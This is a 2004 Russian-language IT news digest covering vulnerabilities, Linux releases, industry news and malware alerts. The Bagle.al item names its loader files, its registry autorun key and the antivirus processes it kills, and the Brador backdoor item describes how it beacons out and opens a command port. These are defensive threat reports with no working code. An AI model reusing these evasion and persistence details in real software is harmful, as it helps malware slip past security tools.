Вопрос «Должен ли провайдер блокировать доступ к сайтам с детской порнографией?» власти Китая решают однозначно: наказание грозит не только владельцам нелегальных веб-сайтов, но и провайдерам, размещающим эти ресурсы на своих серверах и предоставляющим к ним доступ. В конце июля председатель КНР Ху Цзиньтао на всекитайском селекторном совещании объявил народную войну нездоровым явлениям в Интернете. Он потребовал разгромить наиболее злостные сайты и сурово наказать их операторов. За последние две недели, по сведениям министерства общественной безопасности КНР, полиция закрыла 700 порносайтов, завела на распространителей нелегальной информации 151 уголовное дело и арестовала 224 подозреваемых. К народной войне с незаконными ресурсами китайское правительство хорошо подготовилось. Всем владельцам сайтов, зарегистрированных в китайском сегменте сети, предложено «немедленно прекратить распространение эротической информации и повысить самодисциплину». С начала года в стране закрыто более 16 тыс. интернет-кафе. В июне был создан портал net.china.cn, на котором посетители могут заполнить анкету и указать властям на ресурсы, содержащие порнографию. Представители спецслужб уверяют, что заполнение анкеты производится анонимно, а сайт создан исключительно для того, чтобы оградить подрастающее поколение от скверны в Интернете. К настоящему времени в службу мониторинга, созданную при госсовете КНР, поступило более 22 тыс. обращений китайских интернет-пользователей. Следует отметить, что борьба за чистоту Интернета ведется в Китае одновременно с полной государственной поддержкой развития коммуникационных технологий и компьютерной грамотности населения - количество пользователей сети в этой стране достигает 100 млн. человек, и по этому показателю Китай уступает только США.
Источник

10/08/2004 12:36 Уязвимость в Citrix Secure Gateway
Обнаружена дыра в пакете Citrix Secure Gateway для операционной системы Sun Solaris. Как сообщает датская компания Secunia, уязвимость, теоретически, позволяет организовать DoS-атаку на удаленную систему. Подробности об ошибке не раскрываются, известно лишь, что она присутствует во всех версиях программы Citrix Secure Gateway с индексом до 1.14. Устранить опасность можно путем инсталляции обновленной версии пакета.
Описание от Secunia

10/08/2004 12:14 Терминальный Linux
Компания Wyse Technologies выпустила новый терминал, WinTerm 5150SE, и специализированную версию Linux для него - Wyse Linux 6. Анонсируя устройство, представители Wyse сослались на исследование IDC, согласно данным которого, 20% всех тонких терминальных клиентов работают под управлением Linux. В основе Wyse Linux - последняя версия ядра Linux BSD, 2.6.5. Операционная система Wyse имеет модульную структуру, что позволяет заказчикам выбирать только требуемые для их задач компоненты. ОС поддерживает ICA 8 - последнюю версию протокола разработки Citrix Systems, позволяющего отображать на терминалах приложения, размещенные на сервере. WinTerm 5150SE выполнен на процессоре AMD Geode. ОС размещается во флэш-памяти терминала, емкость которой - 32 Мбайт. Емкость оперативной памяти системы - 128 Мбайт.
"Открытые системы"

10/08/2004 11:07 "Забастовка мобильников" докатилась до России
2 сентября в России готовится масштабная акция протеста абонентов мобильной связи: ее организаторы призывают всех недовольных качеством обслуживания сотовых операторов, высокими междугородними тарифами, низким качеством связи и прочими неудобствами, с которыми хоть однажды сталкивался любой владелец «трубки», на 2 часа отключить свои телефоны. Как подчеркивается в обращении на сайте акции, протест касается не только Москвы – его должны поддержать и регионы, где, по мнению организаторов, абоненты сталкиваются с еще большим «беспределом» со стороны операторов. Подобные акции протеста уже прошли в других странах мира: абоненты сотовой связи бастовали в Ливане и Италии. И если итальянцы отреагировали на призыв национальной федерации прав потребителей Intesaconsumatori крайне вяло — четверо из пяти абонентов телефонов не отключали телефоны — то в Ливане протест поддержал каждый второй. Аналогичная забастовка 1 сентября готовится и на Украине. В то же время, у жителей Москвы есть возможность не откладывать свое возмущение качеством услуг и тарифами сотовой связи до сентября: с сегодняшнего дня Департамент транспорта и связи правительства Москвы открывает специальную "горячую линию", сотрудники которой будут выслушивать претензии абонентов. По словам представителей департамента, услышан будет каждый, позвонивший по телефону 788-16-35 с 9:00 до 21:00. Линия будет работать примерно в течение полутора месяцев. Информация будет периодически систематизироваться и передаваться операторам сотовой связи. Ориентировочно в конце сентября этого года на заседании правительства Москвы планируется рассмотреть результаты работы "горячей линии" и совместно с компаниями-операторами разработать рекомендации по улучшению качества связи.
Сайт акции

10/08/2004 10:36 Появление трояна I-Worm.Bagle.al
"Лаборатория Касперского" сообщает об обнаружении новой модификации трояна Bagle, получившего "код" al. Распространяется через Интернет в виде вложений в зараженные электронные письма, а также через файлообменные сети. Для размножения червь использует две компоненты: ZIP-архив, основной модуль. Компонент-загрузчик представляет собой ZIP-архив размером 5932 байта и содержит следующие файлы: price.html, price\price.exe. Файл price.html является вредоносным скриптом Exploit.CodeBaseExec. Предназначен для автоматического запуска файла price.exe. Файл price.exe является троянской программой-загрузчиком, которая предназначена для загрузки основного модуля червя на машину-жертву. Имеет размер 14848 байт. После запуска копирует себя в системный каталог Windows под именем windirect.exe. Регистрируется в ключе автозапуска системного реестра: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "win_upd2.exe" = "%system%\windirect.exe". После этого извлекает из своего тела файл-загрузчик, сохраняет его в системный каталог Windows под именем _dll.exe, и запускает его. Файл _dll.exe имеет размер 11776 байт. После запуска останавливает работу следующих процессов: FIREWALL.EXE, ATUPDATER.EXE, winxp.exe, sys_xp.exe, sysxp.exe, LUALL.EXE, DRWEBUPW.EXE, AUTODOWN.EXE, NUPGRADE.EXE, OUTPOST.EXE, ICSSUPPNT.EXE, ICSUPP95.EXE, ESCANH95.EXE, AVXQUAR.EXE, ESCANHNT.EXE, ATUPDATER.EXE, AUPDATE.EXE, AUTOTRACE.EXE, AUTOUPDATE.EXE, AVXQUAR.EXE, AVWUPD32.EXE, AVPUPD.EXE, CFIAUDIT.EXE, UPDATE.EXE, NUPGRADE.EXE, MCUPDATE.EXE. Затем пытается загрузить основной компонент червя с одного из адресов, прописанных в теле файла. В случае успешной загрузки, троянец запускает файл. Червь открывает на 80 порту локальный HTTP сервер, что позволяет злоумышленникам производить удаленную загрузку и исполнение файлов на инфицированной машине. В спецификации Panda Software червь получил название Bagle.AM.
Более подробно

10/08/2004 10:04 Rambler запустил новую версию рейтинга
Компания Rambler запустила обновленную версию рейтинга-классификатора Rambler's Top 100, сообщается в пресс-релизе, поступившем в редакцию Ленты.Ру. Программное обеспечение сервиса теперь работает на серверах с 64-битными процессорами семейства AMD64, которые были предоставлены компанией "Т-Платформы". В новой версии увеличен запас производительности, повышена надежность работы, а также реализован анализ дополнительных показателей для страниц и сайтов, входящих в рейтинг. Двухпроцессорные системы "Т-Платформы" на базе AMD Opteron обеспечивают на 10-15 процентов более высокую производительность интернет-приложений по сравнению с 32-разрядными решениями. При использовании средств криптографии разница в показателях производительности достигает 50 процентов. Каждый из серверов содержит 8 гигабайт оперативной памяти (с возможностью расширения до 16 гигабайт), которая может быть целиком использована любым приложением. Ultra 320 SCSI-контроллер обеспечивает быстрый доступ к 12 жестким дискам, общий объем которых может превышать 1,5 терабайта. Дублирование данных обеспечивает высокую надежность системы. Как говорится в пресс-релизе, необходимость перехода на новые серверы продиктована постоянным ростом аудитории Рунета и ее активности. "Тор 100 постоянно растет, но переход на 64-битную технологию станет залогом того, что наш рейтинг успешно справится с любым наплывом посетителей.
Lenta.Ru

9/08/2004 15:39 Уязвимости в пакете StackDefender
Компания iDefense обнаружила две дыры в пакете StackDefender разработки фирмы Next Generation, сообщает "Компьюлента". Первая проблема связана с неправильной обработкой параметра 'ObjectAttributes' в функциях ZwOpenFile() и ZwCreateFile(). Используя данную уязвимость, злоумышленники могут организовать DoS-атаку на удаленную систему. Похожая проблема может возникать в функциях ZwAllocateVirtualMemory() и ZwProtectVirtualMemory() при обработке параметра 'BaseAddress'. Ошибки присутствуют в пакетах StackDefender версий 1.10 и 2.0. Устранить опасность можно путем установки новой модификации программы с индексом 2.10.
Первая уязвимость
Вторая уязвимость

9/08/2004 14:34 Уязвимость в Linux
Поль Старзец обнаружил я ядре Linux ошибку, которая позволяет просматривать содержимое ядра операционной системы. Ошибка обнаружена в процедуре работы с файлами и возникает при преобразовании 64-разрядного указателя в 32-разрядный. Другая ошибка с файлами в Linux связана с виртуальной файловой системой gnome-vfs, в которой обнаружена ошибка, позволяющая исполнять произвольный код. Для этого необходимо, чтобы пользователь, от чьего имени должен быть исполнен код, загрузил специально подготовленный URL в одно из приложений, использующих библиотеку gnome-vfs. Атака может быть удаленной. Кроме того, обнаружена еще одна ошибка в библиотеке libpng, которая предназначена для работы с графическими файлами в формате PNG. Ошибка позволяет имплантировать в картинку этого формата произвольный код, который также может быть исполнен удаленно. Для этой ошибки уже опубликованы эксплойт и исправления.
"Открытые системы"

9/08/2004 14:11 Бесплатная корпоративная Linux готовится к этапу тестирования
Опытную версию UserLinux, продукта, предназначенного для предоставления корпоративным заказчикам возможностей Red Hat Linux, но без ее ценника, планируется выпустить в начале сентября. «Beta 1 выйдет 1 сентября, — сказал основатель UserLinux и активист движения open-source Брюс Перенс на конференции LinuxWorld Conference and Expo в Сан-Франциско. — UserLinux это корпоративная Linux без высокой цены». UserLinux добилась некоторого прогресса в плане поддержки, собрав «тесный круг» партнеров, присоединившихся к планируемой группе сертифицированных компаний. Однако успехи в другой области — привлечении партнеров по программному обеспечению к сертификации их продуктов для работы с дешевой UserLinux — пока недостаточны, сказал Перенс. Red Hat, крупнейший продавец Linux, требует от своих заказчиков приобретения отдельного контракта на поддержку для каждого сервера, на котором установлено ПО. И хотя саму Linux можно загрузить бесплатно, Red Hat берет за поддержку и обновления по $299 на сервер в год. Novell, продавец Linux номер два, берет минимум по $349 на сервер в год за поддержку своего продукта SuSE Linux. Обе компании увеличивают цены за использование ПО на более мощных серверах, но ни одна из них не применяет принятую в софтверной индустрии практику взимания дополнительной платы за каждый «клиентский» компьютер, подключенный к серверу.
Подробности

9/08/2004 13:54 В планах SGI - кластер в 10240 процессоров
Агентство NASA объявило о планах собрать двенадцать 512-процессорных суперкомпьютеров Altix компании Silicon Graphics в один кластер, соединённый с массивом SGI Infinite Storage ёмкостью в 500 ТБ. Суперкомпьютеры Altix работают на базе процессоров Itanium2 с архитектурой Origin 3000 под управлением Linux. Количество процессоров было увеличено до 512 в прошлом году. Кстати, ходят слухи, что SGI намеревается в ближайшем будущем оборудовать Altix'ы ещё и кластерной ATI-графикой.
Пресс-релиз

9/08/2004 13:30 Украина нарушает авторские права
Международная федерация фонографической индустрии (IFPI) рекомендует правительству Украины усилить наказание за нарушение авторских прав. Это особенно важно, учитывая, что Верховная Рада до сих пор не внесла соответствующих поправок к закону, регулирующему производство компакт-дисков, в то время как Украина, по данным опубликованного IFPI ежегодного отчета о борьбе с нелегальным производством и реализацией компакт-дисков, опять оказалась в списке десяти стран, которые недостаточно противодействуют пиратству. В отчете Международной федерации положительно оценены попытки украинской милиции, направленные на противодействие торговле нелегальным товаром. Однако меры против распространителей названы неадекватными. Основной причиной для Украины является огромный наплыв незаконной музыкальной продукции из России: украинские таможенники не блокируют пути этих поставок. Пиратский рынок компакт-дисков в Украине оценивается в 42 миллиона долларов США.
crime-research.ru

9/08/2004 13:19 Выход ядра Linux 2.4.27
После долгого перерыва выпущена очередная версия ядра ветви 2.4 - 2.4.27. Изменения в основном касаются различных исправлений, ChangeLog - довольно внушительный. Также устранены 6 ошибок в системе безопаности. Судя по всему - это последняя версия ветви 2.4, в дальнейшем новые версии будут выпускаться только в особо критических случаях, например, в случае устранения в системе безопасности различных компонентов. Разработчики в основном (что логично) сосредотачивают усилия на ветви 2.6.
ChamgeLog

9/08/2004 12:49 Новый червь Saros
Компания Symantec предупреждает о появлении новой вредоносной программы Saros, распространяющейся по электронной почте, через файлообменные сети и каналы IRC. При проникновении на компьютер вирус вносит изменения в реестр операционной системы, копирует себя под различными именами в папки Windows и Kazaa, а также осуществляет массовые рассылки вредоносного кода по всем найденным в книге контактов Outlook адресам. Далее червь проверяет системную дату, и если она совпадает с 11 и 23 числом месяца, меняет стартовую страницу браузера Internet Explorer на www.gedzac.tk. Кроме того, Saros выводит на дисплей сообщения: Title: Microsoft Windows Update; Text: Click Yes For Update Microsoft Outlook via E-mail.
Описание червя

8/08/2004 21:30 Microsoft CRM несовместима с XP Service Pack 2
Согласно статье, размещенной в базе Microsoft Knowledge Base, инструментарий Microsoft Business Solutions CRM 1.0 не будет работать в Windows XP после установки пакета XP Service Pack 2. Перед его инсталляцией рекомендуется обновить клиентскую часть инструментария до версии 1.2. После установки CRM и CRM Sales for Outlook 1.2 необходимо также инсталлировать специальные обновления для Microsoft CRM Server и Outlook и выполнить еще некоторые действия, которые в подробностях описаны в указанной статье. "XP Service Pack 2 модифицирует некоторый настройки зон безопасности Internet Explorer и рабочего стола, устанавливаемые по умолчанию, - пояснил представитель Microsoft. - На протяжении процесса разработки SP2 мы не раз сообщали клиентам о том, что некоторые приложения, в том числе созданные самой Microsoft, для нормальной работы с SP2 потребуют обновления".
"Открытые системы"

8/08/2004 21:08 Sun обеспечивает совместимость Solaris с Linux
В Sun Microsystems разрабатывается программное обеспечение под кодовым именем Janus, которое позволит исполнять в ОС Solaris приложения, сертифицированные на совместимость с дистрибутивом Red Hat Advanced Linux Server 3. По словам представителя Sun, Janus разрабатывается для систем на x86-процессорах производства Intel и AMD. Sun и ранее предлагала систему обеспечения совместимости с Linux - Ixrun. Однако в отличие от последней Janus исполняется на уровне ядра Solaris, является полностью интегрированным в ОС и будет полноценно поддерживаться Sun. Ixrun же предлагается только на компакт-диске с дополнениями, входящем в комплект поставки неподдерживаемой производителем Solaris с открытым кодом. Janus планируется включить в состав Solaris 10, которую в компании собираются выпустить к концу этого года.
"Открытые системы"

8/08/2004 20:23 В РФ принят закон о коммерческой тайне
Как сообщает bugtraq.ru, в России принят закон о коммерческой тайне. Закон внес наконец-то ясность в определение "коммерческой тайны" и формализовал связанные с ней отношения. Посему теперь перед утаскиванием информации в Internet надо внимательно читать пункты 4 и 5 статьи 14 этого закона, в которых говорится об ответственности за "неумышленное незаконное" использование информации, составляющей коммерческую тайну.
Закон в RTF-формате

8/08/2004 18:39 Mozilla Foundation будет выплачивать премию за обнаружение уязвимостей
Mozilla Foundation, разработчик популярных Вэб-браузера Firefox и почтового агента Thunderbird, объявила о том, что она будет выплачивать премию в размере $500 за каждую обнаруженную уязвимость (и баг) в своём ПО. Впрочем, подобная премия будет выплачиваться на конкурсной основе авторитетной комиссией компании. Подобная инициатива запущена при поддержке одного из разработчиков ПО Linux - Linspire, а также Интернет-предпринимателя Mark Shuttleworth (для справки - им была основана южноафриканская компания по подтверждению цифровых сертификатов Tawte, после продажи компании за очень круглую сумму Марк прославился тем, что слетал в космос на борту российского корабля "Союз-ТМА"). Цель подобной акции вполне очевидна - усилить безопасность собственного ПО. Жаль, что подобная акция не исходит от Microsoft. Впрочем, есть подозрения, что компьютерный гигант уже давно разорился бы в результате подобных акций. ;)
ComputerWeekly.com

8/08/2004 17:43 Антивирус Касперского® 5.5 для Novell NetWare переходит на этап бета-тестирования
"Лаборатория Касперского" сообщает о начале бета-тестирования Антивируса Касперского® 5.5 для Novell NetWare. Компания приглашает всех желающих принять участие в программе внешнего тестирования нового продукта. Основное отличие Антивируса Касперского 5.5 для Novell Netware от предшествующей версии заключается в значительном расширении средств управления защитой сервера. Теперь к управлению приложением средствами стандартного модуля NetWare, ConsoleOne, добавлена возможность удаленного администрирования решения посредством веб-интерфейса. Дополнительное удобство для администратора предоставляет графическое исполнение интерфейса, практически идентичное интерфейсу модуля управления под ConsoleOne. Необходимо отметить, что новая версия сохранила все инновационные технологические решения, свойственные предшествующему продукту. В частности, запуск антивирусного ядра, осуществляющего проверку файлов на отсутствие вирусов, производится в защищенном адресном пространстве. Благодаря этому в случае нештатной ситуации, возникшей при проверке файла и вызвавшей сбой функционирования антивирусной защиты, не нарушается работоспособность сервера, что повышает надежность работы продукта и сервера в целом. При работе на многопроцессорных системах для увеличения производительности антивирусной защиты Антивирус Касперского для Novell Netware позволяет осуществить одновременный запуск и работу нескольких экземпляров антивирусного ядра, тем самым в полной мере используя преимущества распределенной обработки информации. Ярким отличием Антивируса Касперского для Novell Netware является эффективная система ведения и предоставления статистических данных.
Условия бета-тестирования

8/08/2004 17:26 Появление червя Mydoom.P
Лаборатории Panda Software зарегистрировали появление Mydoom.P – нового варианта хорошо известного червя Mydoom. Уже были отмечены случаи инфицирования компьютеров новым червем. Mydoom.P распространяется через электронную почту с помощью собственного механизма SMTP. Mydoom P открывает Блокнот (пустой файл). Mydoom.P может появиться из писем со следующими названиями: SN: New secure mail, Secure delivery, failed transaction, Re: hello (Secure-Mail), Re: Extended Mail, Delivery Status (Secure), Re: Server Reply, SN: Server Status. Вот возможные названия приложений, в которых может содержаться червь: mail, message, attachment, transcript, text, document, file, readme. Червь также может появиться через приложения со следующими расширениями: .exe, .zip, -txt.exe, -htm.exe y -txt.scr.
Panda Software

8/08/2004 16:40 График выхода FreeBSD 5.3-RELEASE
Опубликован предварительный график выхода FreeBSD 5.3-RELEASE. Эта версия FreeBSD будет первой 5-STABLE. Тем, кто хочет принять участие в тестировании, наверное будет интересно также ознакомиться и с документом намечаемых доработок и нововведений.
Список ToDo
График выхода

7/08/2004 18:37 На Yahoo подают в суд за оскорбление на веб-форуме
Калифорнийский юрист Стивен Гэлтон (Stephen Galton) подал иск против компании Yahoo. Как сообщает BBC News, адвокат утверждает, что стал объектом "клеветнических и оскорбительных сообщений" от анонимных пользователей на интернет-форуме, принадлежащем Yahoo. По его словам, он обвиняет компанию в укрывательстве пользователей, оскорбляющих людей в интернете, и предлагает другим пострадавшим присоединиться к иску. Гэлтон зарегистрировался на одном из форумов, чтобы ответить на критические замечания в адрес его клиента. После этого другие пользователи форума стали обзывать его и оскорблять. Гэлтон потребовал от Yahoo сообщить ему имена, адреса и телефоны пользователей, которые, по его мнению, его оскорбили, однако компания отказалась предоставить полную информацию. По американским законам пользователи интернета имеют право анонимно высказывать свое мнение, однако при этом имеется ряд ограничений, не позволяющих им пользоваться анонимностью бесконтрольно. Во многих странах, компании, предоставляющие услуги в интернете получают статус "общественной линии связи", который снимает с них юридическую ответственность за поведение пользователей в сети.
Lenta.Ru

6/08/2004 20:15 Определен примерный срок выхода следующего стабильного релиза Debian Linux
Как сообщает Steve Langasek, выход следующей стабильной версии Debian/GNU Linux (кодовое название "Sarge") намечен на 15 сентября 2004 года.
Главная ссылка к новости
Release goals - что еще предстоит доделать
opennet.ru

6/08/2004 20:08 Рунет не подведут под отдельный закон
«Специального „закона об интернете“, который якобы готовится Советом Федерации в глубокой тайне, просто не существует», — сообщила Людмила Нарусова, член Комиссии Совета Федерации по информационной политике. Тем не менее, регулироваться Рунет будет. Как сообщила г-жа Нарусова в интервью «Радио ООН», то, что было ошибочно воспринято как попытка создать свод документов, регламентирующих использование интернета в России, на самом деле является процессом подготовки новой редакция закона «О средствах массовой информации». «Старая редакция закона была подготовлена более 10 лет назад и за это время морально устарела. Устарели, разумеется, не фундаментальные принципы свободы слова, заложенные в этом законе. Просто в то время еще не были так распространены современные информационные технологии, — рассказала она. — Поэтому сегодня, например, интернет-издания далеко не всегда находятся в рамках правового поля. Это, кстати, создает неудобства для самих интернет-изданий, которые не могут воспользоваться льготами, положенными средствам массовой информации. Поэтому в новой редакции закона „О СМИ“ будет уделено отдельное внимание интернет-изданиям».
cnews.ru

6/08/2004 20:05 Русская версия сервис-пака к Windows XP выйдет в сентябре
Второй сервис-пак для операционной системы Windows XP является одним из самых ожидаемых продуктов компании. Несмотря на многочисленные задержки - на нынешней неделе выход сервис-пака был вновь перенесен в самый последний момент перед релизом. Тем не менее, Microsoft обещает выпустить пакет обновлений в течение августа. Это, впрочем, касается только англоязычной версии сервис-пака и версий для некоторых европейских и азиатских языков. Русские версии продуктов Microsoft и курпных обновлений к ним, как правило, выходят несколько позже англоязычных. Не станет исключением и второй сервис-пак для Windows XP. В российском представительстве Microsoft "Компьюленте" сообщили, что русская версия сервис-пака появится приблизительно через месяц после появления английской версии. То есть, скорее всего, в течение сентября. Точная дата релиза русскоязычного сервис-пака пока не определена. Напомним, что второй сервис-пак станет не простым набором исправлений и дополнений к Windows XP, выпущенных после выхода первого сервис-пака. В пакете обновлений будут реализованы многочисленные изменения, затрагивающие основы операционной системы и призванные сделать ее безопаснее. Помимо прочего, второй сервис-пак добавит в Windows новый компонент - "Центр безопасности" (Windows Security Center), с помощью которого можно будет гибко управлять настройками безопасности системы. Поскольку изменения, вносимые сервис-паком в ОС, будут достаточно серьезны, некоторые программы могут оказаться несовместимы с обновленной ОС. В частности, с сервис-паком не совместим программный пакет для бизнеса Microsoft CRM 1.2. Впрочем, для него уже выпущен патч, ликвидирующий проблемы совместимости.
compulenta.ru

6/08/2004 09:39 Исправление уязвимостей Opera
Компания Opera Software выпустила очередное обновление для своего "самого быстрого на Земле браузера". В Opera 7.54 исправлены три уязвимости различной степени опасности. Первая из них была обнаружена специалистами компании Greymagic 19 июля, но информация о ней была опубликована только 5 августа - после выхода исправленной версии. Дыра связана с разрешением записи в объект location. Изменив несколько методов в этом объекте, злоумышленник может считывать с компьютера важную информацию, подделывать URL страницы и выполнять другие действия. Вторая дыра, о которой сообщила компания Secunia позволяет подделывать URL сайтов и, таким образом, заниматься фишингом и выманивать у пользователя важные персональные данные через специальный сайт, выдаваемый за сайт заслуживающей доверия организации, например, банка. Наконец, в новой версии Opera было запрещено обращение к хранящемся на компьютере файлам с HTML-страниц, не являющихся локальными файлами.
compulenta.ru

6/08/2004 09:36 America Online внедряет новый способ борьбы со спамом
Корпорация America Online сделала новый шаг на пути борьбы со спамом. 4 августа ее представители заявили о покупке небольшой компании Mailblocks, специализирующейся на разработке антивирусного программного обеспечения. Именно эта частная компания стала пионером в создании системы «запрос-ответ», блокирующей спамерские послания, сообщает газета Washington Post (требуется бесплатная регистрация). В момент срабатывания системы «запрос-ответ» отправитель письма автоматически получает послание, в котором его просят набрать подтверждающий код. Таким образом система отсеивает письма, отправленные не человеком, а компьютером. «Запрос-ответ» позволяет пользователям не полагаться только на спам-фильтры, которые отсеивают нежелательные послания по ключевым словам. По словам пресс-секретаря AOL Николас Грэхема (Nicholas Graham), услуги системы «запрос-ответ» будут предоставляться пользователям бесплатно. Ожидается, что ими воспользуются около 30 млн человек по всему миру. Несмотря на свою эффективность «запрос-ответ» распространяется значительно медленнее, чем полагали некоторые эксперты. Компания EarthLink, насчитывающая около 5 млн почтовых абонентов, предложила им аналогичную систему еще летом прошлого года. В настоящее время системой пользуются 673 тыс. клиентов, сообщил пресс-секретарь EarthLink Джерри Грассо (Jerry Grasso).
viruslist.ru

5/08/2004 16:18 Критическая дыра в Mozilla
Компания iDefence сообщила об обнаружении уязвимости в браузере Mozilla. Дыра является критической и позволяет злоумышленнику выполнить в системе произвольный код. Уязвимость связана с переполнением при создании объекта SOAPParameter, а использовать ее злоумышленник может, создав веб-страницу, содержащую специальный код на javascript и заманив на эту страницу пользователя. Дыра актуальна для всех версий Mozilla вплоть до 1.6, а также для основанных на Mozilla браузерах Netscape 7.x. В последней версии Mozilla 1.7.1 дыра отсутствует. Про популярный браузер Mozilla Firefox в сообшении iDefence ничего не говорится. Однако, учитывая, что последняя его версия с индексом 0.9.1 (или 0.9.2 для Windows) основана на коде Mozilla 1.7.1, то дыры в ней нет. Более ранние версии, скорее всего, являются уязвимыми для атаки. Всем пользователям уязвимых версий эксперты рекомендуют перейти на Mozilla 1.7.1, либо отключить поддержку javascript. В последнем случае, однако, многие сайты будут работать неправильно.
compulenta.ru

5/08/2004 16:09 Обновление антивирусной утилиты Microsoft
Компания Microsoft обновила утилиту, предназначенную для удаления с компьютеров вирусов семейств Mydoom, Zindos и Doomjuice. Последняя ее версия умеет обнаруживать и удалять вирусы Mydoom.A, Mydoom.B, Mydoom.E, Mydoom.F, Mydoom.G, Mydoom.J, Mydoom.L, Mydoom.O, Zindos.A, Doomjuice.A и Doomjuice.B. Утилита занимает 120 кб и распространяется бесплатно. Интересно, что это уже четвертая версия программы для удаления Mydoom и "родственных" ему червей с компьютера. Первая версия вышла еще 2 мая и могла справиться только с червями Mydoom.A и Mydoom.B. В качестве операционных систем поддерживались только Windows 2000 и XP. В последней версии поддерживается Windows Server 2003, а также Windows 98 и ME.
compulenta.ru

5/08/2004 16:01 КПК под прицелом вирусописателей
«Лаборатория Касперского» сообщает об обнаружении Backdoor.WinCE.Brador.a - первой backdoor-программы для карманных персональных компьютеров PocketPC на базе Windows CE или более новых версий Windows Mobile. Backdoor.WinCE.Brador.a - утилита удаленного администрирования размером 5632 байт, поражающая КПК на базе Windows CE. После своего запуска программа создает файл с именем "svchost.exe" в папке автозапуска Windows, получая, таким образом, управление системой при каждом включении КПК. Программа определяет IP-адрес зараженной системы и отправляет его по электронной почте автору, информируя его о том, что КПК находится в сети и backdoor активен. После этого программа открывает порт 2989* для приема различных команд. Основная функция Brador.a - открытие портов на зараженных машинах с целью получения злоумышленниками доступа к КПК и полного контроля над мобильным устройством. Программа обладает функцией автозагрузки и удаленного управления, кроме того, она может добавлять или удалять файлы в памяти устройства, а также пересылать их злоумышленнику. Backdoor не имеет функции самораспространения и может попасть на КПК пользователя под видом другой безобидной программы, по классической для троянских программ схеме: через вложения в электронных письмах или прямую загрузку из интернета, а также при передаче данных с настольного компьютера.
viruslist.ru

5/08/2004 15:54 Олимпиада IBM
Компания IBM объявила о начале студенческой олимпиады в области информационных технологий и об открытии русскоязычного студенческого портала. Об этом сообщила пресс-служба компании.
В олимпиаде могут принять участие студенты, аспиранты и соискатели, обучающиеся в области технических наук. Олимпиада проводится в режиме он-лайн и состоит из двух туров. Победители первого тура получат возможность принять участие во втором. Участники должны пройти четыре основных этапа, посвященных проверке знаний, включая знание иностранного языка, информационных технологий IBM, истории корпорации. Все тесты являются обязательными для прохождения каждым участником. Ожидается, что в олимпиаде примет участие несколько сотен студентов и аспирантов. Отбор победителей будет произведен на основе открытого конкурса в течение месяца после официального завершения олимпиады. Победители получат официальное уведомление и их имена будут размещены на сайте олимпиады. Участник, занявший первое место, получит ноутбук IBM ThinkPad, три участника, занявшие второе место будут награждены персональными компьютерами IBM ThinkCentre, и 10 участников, занявших 3 место, получат в качестве приза монитор IBM ThinkVision. Пятьдесят первых участников Олимпиады получат возможность пройти курс обучения в рамках IBM Channel Academy. Одновременно с началом олимпиады была открыта русскоязычная часть студенческого портала. Посетители сайта могут получить информацию о программах IBM для студентов, разнообразных конкурсах и соревнованиях, учебных материалах и курсах, а также возможностях прохождения летней практики. Учебные заведения смогут узнать о программах IBM для университетов в мире, возможностях сотрудничества с корпорацией.
Задания Олимпиады и подробная информация
Студенческий портал
securitylab.ru

5/08/2004 15:51 Гигантам "дыры" нестрашны?
Корпорация Oracle пообещала в ускоренном порядке ликвидировать более 30 уязвимостей в cвоем ПО, некоторые из которых были обнаружены еще в январе этого года и, по мнению специалистов, являются критическими. Британский эксперт в области инфобезопасности Дэвид Литчфилд (David Litchfield), управляющий директор компании Next-Generation Security Software, обнародовал информацию о выявленных им проблемах с обеспечением безопасности продуктов Oracle на прошлой неделе. Он не стал подробно описывать обнаруженные уязвимости, чтобы ими не воспользовались злоумышленники. «Дыры» имеют разную степень критичности – от высокой до низкой, от переполнения буфера и динамически распределяемой области до плохой защиты паролей. В отдельных случаях доступ к системе можно получить, вообще не вводя имени пользователя либо пароля. Пользователь с ограниченными правами доступа к системе может поэтапно повысить свой статус до уровня администратора. Впервые г-н Литчфилд проинформировал Oracle о выявленных в ее ПО «дырах» еще в январе 2004 года, однако, несмотря на постоянные напоминания, корпорация до сих пор не выпустила ни одного исправления для указанных им проблем. По словам британского эксперта, каждый, кто затратит время на изучение списков уже выпущенных компанией обновлений системы безопасности, сможет составить представление о степени уязвимости ее продуктов. Однако нежелание Oracle взглянуть правде в глаза вполне аналогично поведению большинства конкурентов компании, включая Microsoft, IBM, и многих других «китов» ИТ-рынка. Эксперт заметил, что в этом плане Oracle могла бы многое почерпнуть у Microsoft в плане лексики. «Microsoft традиционно является большой мишенью, - заметил он, - и несет от этого значительный ущерб. Однако Microsoft сумел выработать более эффективный подход к разрешению этих проблем и в настоящее время обошел остальных игроков на рынке по своей способности адекватно реагировать на возникающие проблемы».
cnews.ru

5/08/2004 15:33 С интернет-зависимостью не берут в армию
Как сообщает агентство Reuters, министерство обороны Финляндии приняло решение освобождать призывников, страдающих интернет-зависимостью, от службы в вооруженных силах страны. В Финляндии комплектование национальной армии осуществляется по призыву, срок службы – шесть месяцев. Основания для такого решения финских военкомов более чем весомые: медики обнаружили, что юноши, расставшись со своими компьютерами, переносят разлуку слишком уж тяжело. «Для людей, сидящих в интернете ночи напролет, не имеющих больше ни других хобби, ни друзей, попасть в армию – слишком тяжелый удар», - заявил начальник службы по работе с призывниками, капитан третьего ранга Юрки Кивела (Jyrki Kivela). Он сообщил, что больным будет предоставлена отсрочка на три года – вполне возможно, что за это время они найдут в себе силы пересилить свой недуг и встать в строй. Официальных данных о числе жертв такого недуга, как интернет-зависимость, в Финляндии не приводится. В 2003 году призыву в Финляндии подлежало 26,5 тыс. человек. 9% из них были освобождены от службы по медицинским основаниям. Но особой проблемы из этого финские военные не делают. «Мы очень гордимся финскими мужчинами, - заявил Кивела. – 82% финнов полностью исполняют свой воинский долг».
cnews.ru

3/08/2004 19:11 «Лаборатория Касперского»: обзор вирусной активности за июль 2004 года
